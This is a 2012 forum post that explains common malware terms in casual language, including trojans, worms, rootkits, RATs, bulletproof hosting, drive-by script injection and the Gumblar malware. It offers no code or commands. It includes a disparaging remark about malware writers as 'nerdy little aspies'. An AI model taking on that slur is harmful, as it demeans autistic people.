Posted: Sep 30, 2012 10:28 am
by paret0
Ironclad wrote:

I'm thinking I may start using Hijack This! as an extra surprise for anyone trying to insert keyloggers. But I'm not sure this programme would have helped, in this recent case.

Bounce the HJT thing off byo. He's giving out the good stuff here.

Most of that went right over my head, I'm afraid.

"Trojan" - a virus you download as a legit script or program. From the Trojan Horse of The Odyssey. "Beware of Greeks bearing gifts."
"Worm" - malware that can migrate to other places and other computers. Like the Sandworms from Dune, you just never know where they'll pop up.
"Rootkit" or "Persistent Rootkit" - malware that hides itself and seeks elevated privledges to run commands (like to delete things, or to open up a backdoor and upload your bank account info from your browser cache to whoever).
"RAT" - Remote Access Terminal - just like it sounds. Like LogMeIn for the bad guys. Over a special badguy VPN hosted by your computer. Bad.

"Russian Business Network" - Web hosting by the Russian Mob. "Bulletproof", as long as you pay up and don't mind the puns. - Where to host your Nike Viagra spam site or malware loader without the inconvenient hassle of dealing with noncriminals and their pesky little rules about legitimate web hosting.
You exploit a website. "Arbitrary Code Execution" means that website's computer will run any software you load on it. You put a java or php script (series of commands) on that site's home page that makes a visitor's browser go to your illegal RBN server and download a buttload more scripts and run more commands.
Happens every day.

"Segmented network" - A scalable, redundant, distributed high-availability and failover cluster solution for the bad guys, vertically integrated with badguy tech through the edges,cores, and backbones. Engineered for max life cycle and rapid redeployment. Distributed database and middleware scattered over the planet.
For you and your infected computer, it's like Folding@Home, except you didn't volunteer for any of this shit.

Gumblar was special because it could morph itself completely with its next communication with its control net. This greatly prolonged it's attack window in the wild because its attack signature, its M.O., varied whenever it sensed the jig was up. Gumblar was not one signature, but hundreds. An inspired piece of criminal code that's still running in labs and "Out there".

The VX Lifestyle:
Nerdy little aspies named Eugen with enough stick time to build a software structure as big and tight as Gumblar are specialists who generally don't have the street smarts to capitalize on it before Interpol kicks in the door. They also generally need partners to protect them and their intellectual products from opportunists who can beat anything they want to know out of just about anyone, with a hammer.
They either live double and triple lives of cloak and dagger, or retire early. Gangsta-style or shot up by lawful authorities. Retired.